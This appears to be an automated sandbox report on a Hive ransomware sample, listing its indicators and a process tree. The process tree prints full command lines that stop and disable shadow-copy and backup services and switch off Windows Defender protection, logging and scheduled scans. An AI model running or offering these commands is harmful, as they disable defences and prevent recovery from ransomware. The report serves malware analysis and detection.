description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4192 vssadmin.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133883648206050820" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ tor-browser-windows-x86_64-portable-14.0.9.exe -
Opens file in notepad (likely ransom note) 2 IoCs
pid Process 516 NOTEPAD.EXE 384 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4548 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3944 powershell.exe 3944 powershell.exe 3944 powershell.exe 1792 powershell.exe 1792 powershell.exe 1792 powershell.exe 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 1832 7zFM.exe 1920 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 6112 chrome.exe 6112 chrome.exe 6112 chrome.exe 6112 chrome.exe 6112 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 1832 7zFM.exe Token: 35 1832 7zFM.exe Token: SeSecurityPrivilege 1832 7zFM.exe Token: SeSecurityPrivilege 400 wevtutil.exe Token: SeBackupPrivilege 400 wevtutil.exe Token: SeSecurityPrivilege 2432 wevtutil.exe Token: SeBackupPrivilege 2432 wevtutil.exe Token: SeSecurityPrivilege 3576 wevtutil.exe Token: SeBackupPrivilege 3576 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1076 wmic.exe Token: SeSecurityPrivilege 1076 wmic.exe Token: SeTakeOwnershipPrivilege 1076 wmic.exe Token: SeLoadDriverPrivilege 1076 wmic.exe Token: SeSystemProfilePrivilege 1076 wmic.exe Token: SeSystemtimePrivilege 1076 wmic.exe Token: SeProfSingleProcessPrivilege 1076 wmic.exe Token: SeIncBasePriorityPrivilege 1076 wmic.exe Token: SeCreatePagefilePrivilege 1076 wmic.exe Token: SeBackupPrivilege 1076 wmic.exe Token: SeRestorePrivilege 1076 wmic.exe Token: SeShutdownPrivilege 1076 wmic.exe Token: SeDebugPrivilege 1076 wmic.exe Token: SeSystemEnvironmentPrivilege 1076 wmic.exe Token: SeRemoteShutdownPrivilege 1076 wmic.exe Token: SeUndockPrivilege 1076 wmic.exe Token: SeManageVolumePrivilege 1076 wmic.exe Token: 33 1076 wmic.exe Token: 34 1076 wmic.exe Token: 35 1076 wmic.exe Token: 36 1076 wmic.exe Token: SeIncreaseQuotaPrivilege 2816 wmic.exe Token: SeSecurityPrivilege 2816 wmic.exe Token: SeTakeOwnershipPrivilege 2816 wmic.exe Token: SeLoadDriverPrivilege 2816 wmic.exe Token: SeSystemProfilePrivilege 2816 wmic.exe Token: SeSystemtimePrivilege 2816 wmic.exe Token: SeProfSingleProcessPrivilege 2816 wmic.exe Token: SeIncBasePriorityPrivilege 2816 wmic.exe Token: SeCreatePagefilePrivilege 2816 wmic.exe Token: SeBackupPrivilege 2816 wmic.exe Token: SeRestorePrivilege 2816 wmic.exe Token: SeShutdownPrivilege 2816 wmic.exe Token: SeDebugPrivilege 2816 wmic.exe Token: SeSystemEnvironmentPrivilege 2816 wmic.exe Token: SeRemoteShutdownPrivilege 2816 wmic.exe Token: SeUndockPrivilege 2816 wmic.exe Token: SeManageVolumePrivilege 2816 wmic.exe Token: 33 2816 wmic.exe Token: 34 2816 wmic.exe Token: 35 2816 wmic.exe Token: 36 2816 wmic.exe Token: SeIncreaseQuotaPrivilege 2816 wmic.exe Token: SeSecurityPrivilege 2816 wmic.exe Token: SeTakeOwnershipPrivilege 2816 wmic.exe Token: SeLoadDriverPrivilege 2816 wmic.exe Token: SeSystemProfilePrivilege 2816 wmic.exe Token: SeSystemtimePrivilege 2816 wmic.exe Token: SeProfSingleProcessPrivilege 2816 wmic.exe Token: SeIncBasePriorityPrivilege 2816 wmic.exe Token: SeCreatePagefilePrivilege 2816 wmic.exe Token: SeBackupPrivilege 2816 wmic.exe Token: SeRestorePrivilege 2816 wmic.exe Token: SeShutdownPrivilege 2816 wmic.exe Token: SeDebugPrivilege 2816 wmic.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1832 7zFM.exe 1832 7zFM.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3416 wrote to memory of 4792 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 101 PID 3416 wrote to memory of 4792 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 101 PID 4792 wrote to memory of 5784 4792 net.exe 103 PID 4792 wrote to memory of 5784 4792 net.exe 103 PID 3416 wrote to memory of 5856 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 104 PID 3416 wrote to memory of 5856 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 104 PID 5856 wrote to memory of 1660 5856 net.exe 106 PID 5856 wrote to memory of 1660 5856 net.exe 106 PID 3416 wrote to memory of 4380 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 107 PID 3416 wrote to memory of 4380 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 107 PID 4380 wrote to memory of 2440 4380 net.exe 109 PID 4380 wrote to memory of 2440 4380 net.exe 109 PID 3416 wrote to memory of 5220 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 110 PID 3416 wrote to memory of 5220 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 110 PID 5220 wrote to memory of 3080 5220 net.exe 112 PID 5220 wrote to memory of 3080 5220 net.exe 112 PID 3416 wrote to memory of 5332 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 113 PID 3416 wrote to memory of 5332 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 113 PID 5332 wrote to memory of 1088 5332 net.exe 115 PID 5332 wrote to memory of 1088 5332 net.exe 115 PID 3416 wrote to memory of 5872 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 116 PID 3416 wrote to memory of 5872 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 116 PID 5872 wrote to memory of 3812 5872 net.exe 118 PID 5872 wrote to memory of 3812 5872 net.exe 118 PID 3416 wrote to memory of 5908 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 119 PID 3416 wrote to memory of 5908 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 119 PID 5908 wrote to memory of 1932 5908 net.exe 121 PID 5908 wrote to memory of 1932 5908 net.exe 121 PID 3416 wrote to memory of 3936 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 122 PID 3416 wrote to memory of 3936 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 122 PID 3936 wrote to memory of 1592 3936 net.exe 124 PID 3936 wrote to memory of 1592 3936 net.exe 124 PID 3416 wrote to memory of 6096 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 125 PID 3416 wrote to memory of 6096 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 125 PID 3416 wrote to memory of 2932 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 127 PID 3416 wrote to memory of 2932 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 127 PID 3416 wrote to memory of 5212 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 129 PID 3416 wrote to memory of 5212 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 129 PID 3416 wrote to memory of 5132 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 131 PID 3416 wrote to memory of 5132 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 131 PID 3416 wrote to memory of 1240 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 133 PID 3416 wrote to memory of 1240 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 133 PID 3416 wrote to memory of 4472 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 135 PID 3416 wrote to memory of 4472 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 135 PID 3416 wrote to memory of 1596 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 137 PID 3416 wrote to memory of 1596 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 137 PID 3416 wrote to memory of 2780 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 139 PID 3416 wrote to memory of 2780 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 139 PID 3416 wrote to memory of 5764 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 141 PID 3416 wrote to memory of 5764 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 141 PID 3416 wrote to memory of 3844 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 143 PID 3416 wrote to memory of 3844 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 143 PID 3416 wrote to memory of 3900 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 145 PID 3416 wrote to memory of 3900 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 145 PID 3416 wrote to memory of 4044 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 147 PID 3416 wrote to memory of 4044 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 147 PID 3416 wrote to memory of 1988 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 149 PID 3416 wrote to memory of 1988 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 149 PID 3416 wrote to memory of 652 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 151 PID 3416 wrote to memory of 652 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 151 PID 3416 wrote to memory of 1092 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 153 PID 3416 wrote to memory of 1092 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 153 PID 3416 wrote to memory of 3040 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 155 PID 3416 wrote to memory of 3040 3416 Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe 155 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1832
-
C:\Users\Admin\Desktop\Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe"C:\Users\Admin\Desktop\Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe"1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:5784
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:5856 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1660
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:2440
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:5220 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:3080
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:5332 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1088
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:5872 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:3812
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:5908 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1932
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_2a6b6" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_2a6b6" /y3⤵PID:1592
-
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:6096
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:2932
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:5212
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵
- Launches sc.exe
PID:5132
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:1240
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:4472
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:1596
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_2a6b6" start= disabled2⤵
- Launches sc.exe
PID:2780
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
PID:5764
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3844
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:3900
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:4044
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1988
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:652
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1092
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3040
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3044
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:396
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1996
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:5644
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:5932
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:5248
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3912
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:440
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:5452
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:2912
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:864
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:4828
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:5208
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:992
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:2276
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:5272
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:556
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:3076
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:6076
-
-
